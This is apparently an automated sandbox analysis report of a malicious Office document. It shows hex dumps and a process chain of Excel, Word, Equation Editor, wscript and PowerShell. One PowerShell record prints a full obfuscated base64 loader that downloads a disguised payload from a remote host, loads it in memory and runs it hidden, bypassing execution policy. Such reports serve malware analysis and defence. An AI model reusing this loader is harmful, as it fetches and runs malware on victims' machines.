                                                  2024-08-16 07:32:46 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                  Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                  2024-08-16 07:32:46 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                  Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                  2024-08-16 07:32:46 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                  Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                  2024-08-16 07:32:46 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                  Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                  2024-08-16 07:32:46 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                  Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:03:32:07
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                  Imagebase:0x13fcd0000
                                                  File size:28'253'536 bytes
                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:3
                                                  Start time:03:32:28
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                  Imagebase:0x13fe10000
                                                  File size:1'423'704 bytes
                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:5
                                                  Start time:03:32:39
                                                  Start date:16/08/2024
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543'304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:03:32:41
                                                  Start date:16/08/2024
                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS"
                                                  Imagebase:0xc00000
                                                  File size:141'824 bytes
                                                  MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:8
                                                  Start time:03:32:41
                                                  Start date:16/08/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBH? ? ? ? ?FI? ? ? ? ?Vw? ? ? ? ?v? ? ? ? ?DM? ? ? ? ?N? ? ? ? ?? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Mw? ? ? ? ?z? ? ? ? ?C4? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?DE? ? ? ? ?Lg? ? ? ? ?w? ? ? ? ?DE? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                  Imagebase:0xfa0000
                                                  File size:427'008 bytes
                                                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:03:32:43
                                                  Start date:16/08/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
